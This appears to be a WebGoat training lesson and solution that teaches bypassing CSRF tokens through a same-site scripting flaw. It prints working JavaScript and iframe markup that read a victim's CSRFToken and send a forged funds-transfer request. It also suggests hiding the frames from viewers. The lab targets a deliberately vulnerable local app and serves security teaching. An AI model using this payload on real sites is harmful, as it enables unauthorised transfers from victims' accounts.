CSRF Token By-Pass

Lesson Plan Title:CSRF Token Prompt By-Pass

Concept / Topic To Teach:
This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks.

Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a page that contains a 'forged request' to execute commands with the victim's credentials.

Token-based request authentication deters these attacks. This technique inserts tokens into pages that issue requests. These tokens are required to complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses this technique to help prevent CSRF attacks.

However, this technique can be by-passed if CSS vulnerabilities exist on the same site. Because of the same-origin browser policy, pages from the same domain can read content from other pages from the same domain.

General Goal(s):
Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious request to transfer funds. To successfully complete you need to obtain a valid request token. The URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter "transferFunds=main". Load this page, read the token and append the token in a forged request to transferFunds. When you think the attack is successful, refresh the page and you will find the green check on the left hand side menu.

Solution:

Similar to the CSRF LAB, you must forge a request that will transfer funds. However, a request will not result in a transfer of funds unless it has a correct token. To find a valid token, you could look at the form that the site generates to submit a transfer of funds. To see the transfer funds page, try typing in the URL of the Lesson with the extra parameter of "transferFunds=main"
Picture of transfer initiation form
Transfer initiation form

Next look at the source of the page to see what parameter the token comes in.

<form accept-charset='UNKNOWN' id='transferForm' method='POST' action='attack?Screen=2&menu=900' enctype='application/x-www-form-urlencoded'>
	<input name='transferFunds' type='text' value='0'>
	<input name='CSRFToken' type='hidden' value='1745740650'>
	<input type='submit'>

</form>

From this we see a forged command will need the CSRFToken parameter.

This solution loads this page in an iframe and reads the token out of the frame. Note that this is possible because the message originates from the same domain and does not violate the "same origin policy". So even thought this page has taken measures to prevent CSRF attacks, those measures can be side-stepped because of CSS vulnerabilites. To pull out the CSRFToken, the following javascript locates the frame, then the form, then saves the token

var tokenvalue;

function readFrame1()
{
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("Form")[0];
    var token = form.CSRFToken.value;
    tokenvalue = '&CSRFToken='+token;
    
    loadFrame2();
}

function loadFrame2()
{
    var testFrame = document.getElementById("frame2");
    testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;	
}

readFrame1 will read the frame's content for the CSRFToken, save it and then call loadFrame2 LoadFrame2 will then append the token and load a second frame.

The following frames loads the transfer page in the first frame. When it finishes loading, it will call readFrame1, which calls loadFrame2, which then sets the src for the second iframe.


<iframe	src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=main"
	onload="readFrame1();"
	id="frame1" frameborder="1" marginwidth="0"
	marginheight="0" width="800" scrolling=yes height="300"></iframe>
<iframe id="frame2" frameborder="1" marginwidth="0"
	marginheight="0" width="800" scrolling=yes height="300"></iframe>

The next picture shows inserting this code into a message:
Picture of inserting CSRF code in web page
Inserting CSRF code into message

The following picture shows the results of someone hitting this page. Note that no effort was taken to hide the results of the two frames. The first frame shows the transfer funds form, and the second shows the results of the CSRF attack. Try another post that will hide these iframes from being noticed.

The next picture shows inserting this code into a message:
Picture of the results of viewing the malicious message
Results of viewing the malicious message